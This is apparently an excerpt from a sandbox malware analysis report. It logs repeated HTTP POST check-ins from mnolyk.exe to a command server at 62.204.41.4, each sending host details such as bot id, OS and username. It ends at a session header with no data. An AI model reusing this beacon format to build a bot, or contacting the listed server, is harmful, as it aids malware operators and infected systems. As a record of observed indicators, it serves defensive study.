                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        62 | 192.168.2.5 | 49752 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:59.309365988 CET | 263 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:59.375677109 CET | 263 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        63 | 192.168.2.5 | 49753 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:59.551732063 CET | 264 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:59.619138002 CET | 264 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        64 | 192.168.2.5 | 49754 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:59.800601959 CET | 265 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:59.865664959 CET | 265 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        65 | 192.168.2.5 | 49755 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:00.032530069 CET | 266 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:00.104228020 CET | 266 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        66 | 192.168.2.5 | 49756 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:00.296701908 CET | 267 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:00.362060070 CET | 267 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        67 | 192.168.2.5 | 49757 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:00.537791014 CET | 268 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:00.601149082 CET | 268 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        68 | 192.168.2.5 | 49758 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:00.787103891 CET | 269 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:00.852035046 CET | 269 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        69 | 192.168.2.5 | 49759 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:01.035712957 CET | 270 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:01.102294922 CET | 270 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        7 | 192.168.2.5 | 49697 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:30.331432104 CET | 207 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:30.398885965 CET | 208 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        70 | 192.168.2.5 | 49760 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:01.327723980 CET | 271 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:01.400182962 CET | 271 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        71 | 192.168.2.5 | 49761 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:01.580132008 CET | 272 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:01.646137953 CET | 272 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        72 | 192.168.2.5 | 49762 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:01.814766884 CET | 273 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:01.886197090 CET | 273 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        73 | 192.168.2.5 | 49763 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:02.065956116 CET | 274 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:02.138685942 CET | 274 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        74 | 192.168.2.5 | 49764 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:02.319284916 CET | 275 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:02.385740995 CET | 275 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        75 | 192.168.2.5 | 49765 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:02.563683033 CET | 276 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:02.628305912 CET | 276 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        76 | 192.168.2.5 | 49766 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:02.800103903 CET | 277 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:02.870012999 CET | 277 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        77 | 192.168.2.5 | 49767 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:03.053143978 CET | 278 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:03.120043039 CET | 278 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        78 | 192.168.2.5 | 49768 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:03.301034927 CET | 279 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:03.366358995 CET | 279 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        79 | 192.168.2.5 | 49769 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:03.541604042 CET | 280 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:03.604628086 CET | 280 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        8 | 192.168.2.5 | 49698 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
